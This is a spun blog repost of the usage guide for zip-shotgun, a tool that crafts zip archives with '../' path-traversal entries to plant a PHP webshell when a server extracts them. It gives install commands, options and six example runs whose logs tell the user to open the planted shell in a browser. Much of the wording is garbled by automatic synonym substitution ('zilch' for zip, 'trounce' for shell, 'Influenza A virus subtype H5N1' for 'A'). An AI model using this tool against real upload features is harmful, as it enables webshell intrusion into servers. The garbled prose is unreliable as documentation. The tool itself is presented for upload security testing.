Zip Shotgun - Utility Script To Exam Naught File Upload Functionality (And Possible Extraction Of Naught Files) For Vulnerabilities - Hi friends mederc, In the article that you read this time with the title Zip Shotgun - Utility Script To Exam Naught File Upload Functionality (And Possible Extraction Of Naught Files) For Vulnerabilities, We have prepared this article well for you to read and retrieve information from it. hopefully fill the posts Article Hacking, Article Linux, Article Mac, Article OWASP, Article Pentesting, Article Python, Article Security Testing, Article Security Tools, Article ZIP Shotgun, we write this you can understand. Alright, happy reading.

Title : Zip Shotgun - Utility Script To Exam Naught File Upload Functionality (And Possible Extraction Of Naught Files) For Vulnerabilities
link : Zip Shotgun - Utility Script To Exam Naught File Upload Functionality (And Possible Extraction Of Naught Files) For Vulnerabilities

Zip Shotgun - Utility Script To Exam Naught File Upload Functionality (And Possible Extraction Of Naught Files) For Vulnerabilities

Utility script to exam zilch file upload functionality (and possible extraction of zilch files) for vulnerabilities. Idea for this script comes from this post service on Silent Signal Techblog - Compressed File Upload And Command Execution together with from OWASP - Test Upload of Malicious Files

This script volition practice archive which contains files amongst "../" inwards filename. When extracting this could crusade files to live on extracted to preceding directories. It tin hand the sack let assailant to extract shells to directories which tin hand the sack live on accessed from spider web browser.

Default webshell is wwwolf's PHP spider web trounce together with all the credit for it goes to WhiteWinterWolf. Source is available HERE

Installation

1. Install using Python pip
   pip install zip-shotgun --upgrade
   
2. Clone git repository together with install
   git clone https://github.com/jpiechowka/zip-shotgun.git
   Execute from root directory of the cloned repository (where setup.py file is located)
   pip install . --upgrade
   

Usage together with options

Usage: zip-shotgun [OPTIONS] OUTPUT_ZIP_FILE  Options:   --version                       Show the version together with exit.   -c, --directories-count INTEGER                                   Count of how many directories to larn dorsum                                   within the zilch file (e.g iii agency that iii                                   files volition live on added to the zip: shell.php,                                   ../shell.php together with ../../shell.php where                                   shell.php is the refer of the trounce you lot                                   provided or randomly generated value                                   [default: 16]   -n, --shell-name TEXT           Name of the trounce within the generated zilch                                   file (e.g shell). If non provided it volition live on                                   randomly generated. Cannot convey whitespaces   -f, --shell-file-path PATH      Influenza A virus subtype H5N1 file that contains code for the shell. If                                   this selection is non provided wwwolf                                   (https://github.com/WhiteWinterWolf/wwwolf-                                   php-webshell) php trounce volition live on added                                   instead. If refer is provided it volition live on                                   added to the zilch amongst the provided refer or                                   if non provided the refer volition live on randomly                                   generated.   --compress                      Enable compression. If this flag is ready                                   archive volition live on compressed using DEFALTE                                   algorithm amongst compression flat of 9. By                                   default in that place is no compression applied.   -h, --help                      Show this message together with exit.

Examples

1. Using all default options
   zip-shotgun archive.zip
   Part of the script output
   

   12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | Opening output zilch file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Midweek 23:13:13 +0100 |  WARNING | Shell refer was non provided. Generated random trounce name: BCsQOkiN23ur7OUj 12/Dec/2018 Midweek 23:13:13 +0100 |  WARNING | Shell file was non provided. Using default wwwolf's webshell code 12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | --compress flag was NOT set. Archive volition live on uncompressed. Files volition live on alone stored. 12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | Writing file to the archive: BCsQOkiN23ur7OUj.php 12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: BCsQOkiN23ur7OUj.php 12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | Writing file to the archive: ../BCsQOkiN23ur7OUj.php 12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../BCsQOkiN23ur7OUj.php 12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | Writing file to the archive: ../../BCsQOkiN23ur7OUj.php 12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../../BCsQOkiN23ur7OUj.php ... 12/Dec/2018 Midweek 23:13:13 +0100 |     INFO | Finished. Try to access trounce using BCsQOkiN23ur7OUj.php inwards the URL

2. Using default options together with enabling compression for archive file
   zip-shotgun --compress archive.zip
   Part of the script output
   

   12/Dec/2018 Midweek 23:16:13 +0100 |     INFO | Opening output zilch file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Midweek 23:16:13 +0100 |  WARNING | Shell refer was non provided. Generated random trounce name: 6B6NtnZXbXSubDCh 12/Dec/2018 Midweek 23:16:13 +0100 |  WARNING | Shell file was non provided. Using default wwwolf's webshell code 12/Dec/2018 Midweek 23:16:13 +0100 |     INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Midweek 23:16:13 +0100 |     INFO | --compress flag was set. Archive volition live on compressed using DEFLATE algorithm amongst a flat of ix ... 12/Dec/2018 Midweek 23:16:13 +0100 |     INFO | Finished. Try to access trounce using 6B6NtnZXbXSubDCh.php inwards the URL

3. Using default options but changing the set out of directories to larn dorsum inwards the archive to 3
   zip-shotgun --directories-count iii archive.zip
zip-shotgun -c iii archive.zip
   The script volition write iii files inwards total to the archive
   Part of the script output
   

   12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | Opening output zilch file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Midweek 23:17:43 +0100 |  WARNING | Shell refer was non provided. Generated random trounce name: 34Bv9YoignMHgk2F 12/Dec/2018 Midweek 23:17:43 +0100 |  WARNING | Shell file was non provided. Using default wwwolf's webshell code 12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | --compress flag was NOT set. Archive volition live on uncompressed. Files volition live on alone stored. 12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | Writing file to the archive: 34Bv9YoignMHgk2F.php 12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: 34Bv9YoignMHgk2F.php 12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | Writing file to the archive: ../34Bv9YoignMHgk2F.php 12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../34Bv9YoignMHgk2F.php 12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | Writing file to the archive: ../../34Bv9YoignMHgk2F.php 12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../../34Bv9YoignMHgk2F.php 12/Dec/2018 Midweek 23:17:43 +0100 |     INFO | Finished. Try to access trounce using 34Bv9YoignMHgk2F.php inwards the URL

4. Using default options but providing trounce refer within archive together with enabling compression
   Shell refer cannot convey whitespaces
   zip-shotgun --shell-name custom-name --compress archive.zip
zip-shotgun -n custom-name --compress archive.zip
   Name for trounce files within the archive volition live on ready to the ane provided past times the user.
   Part of the script output
   

   12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Opening output zilch file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Midweek 23:19:12 +0100 |  WARNING | Shell file was non provided. Using default wwwolf's webshell code 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | --compress flag was set. Archive volition live on compressed using DEFLATE algorithm amongst a flat of ix 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Writing file to the archive: custom-name.php 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: custom-name.php 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Writing file to the archive: ../custom-name.php 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../custom-name.php 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Writing file to the archive: ../../custom-name.php 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../../custom-name.php 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Writing file to the archive: ../../../custom-name.php ... 12/Dec/2018 Midweek 23:19:12 +0100 |     INFO | Finished. Try to access trounce using custom-name.php inwards the URL

5. Provide custom trounce file but job random refer within archive. Set directories count to 3
   zip-shotgun --directories-count iii --shell-file-path ./custom-shell.php archive.zip
zip-shotgun -c iii -f ./custom-shell.php archive.zip
   Shell code volition live on extracted from user provided file. Names within the archive volition live on randomly generated.
   Part of the script output
   

   12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Opening output zilch file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Midweek 23:21:37 +0100 |  WARNING | Shell refer was non provided. Generated random trounce name: gqXRAJu1LD8d8VKf 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | File containing trounce code was provided: REDACTED\zip-shotgun\custom-shell.php. Content volition live on added to archive 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Getting file extension from provided trounce file for reuse: php 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Opening provided file amongst trounce code: REDACTED\zip-shotgun\custom-shell.php 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | --compress flag was NOT set. Archive volition live on uncompressed. Files volition live on alone stored. 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Writing file to the archive: gqXRAJu1LD8d8VKf.php 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: gqXRAJu1LD8d8VKf.php 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Writing file to the archive: ../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Writing file to the archive: ../../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Midweek 23:21:37 +0100 |     INFO | Finished. Try to access trounce using gqXRAJu1LD8d8VKf.php inwards the URL

6. Provide custom trounce file together with ready trounce refer to relieve within archive. Set directories count to iii together with job compression
   zip-shotgun --directories-count iii --shell-name custom-name --shell-file-path ./custom-shell.php --compress archive.zip
zip-shotgun -c iii -n custom-name -f ./custom-shell.php --compress archive.zip
   Shell code volition live on extracted from user provided file. Names within the archive volition live on ready to user provided name.
   Part of the script output
   

   12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Opening output zilch file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | File containing trounce code was provided: REDACTED\zip-shotgun\custom-shell.php. Content volition live on added to archive 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Getting file extension from provided trounce file for reuse: php 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Opening provided file amongst trounce code: REDACTED\zip-shotgun\custom-shell.php 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | --compress flag was set. Archive volition live on compressed using DEFLATE algorithm amongst a flat of ix 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Writing file to the archive: custom-name.php 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: custom-name.php 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Writing file to the archive: ../custom-name.php 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../custom-name.php 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Writing file to the archive: ../../custom-name.php 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Setting total read/write/execute permissions (chmod 777) for file: ../../custom-name.php 12/Dec/2018 Midweek 23:25:19 +0100 |     INFO | Finished. Try to access trounce using custom-name.php inwards the URL

Download Zip-Shotgun

Thus the article Zip Shotgun - Utility Script To Exam Naught File Upload Functionality (And Possible Extraction Of Naught Files) For Vulnerabilities

That's all the article Zip Shotgun - Utility Script To Exam Naught File Upload Functionality (And Possible Extraction Of Naught Files) For Vulnerabilities this time, hopefully can benefit you all. okay, see you in another article posting.

You are now reading the article Zip Shotgun - Utility Script To Exam Naught File Upload Functionality (And Possible Extraction Of Naught Files) For Vulnerabilities with the link address https://mederc.blogspot.com/2019/09/zip-shotgun-utility-script-to-exam.html

Share this post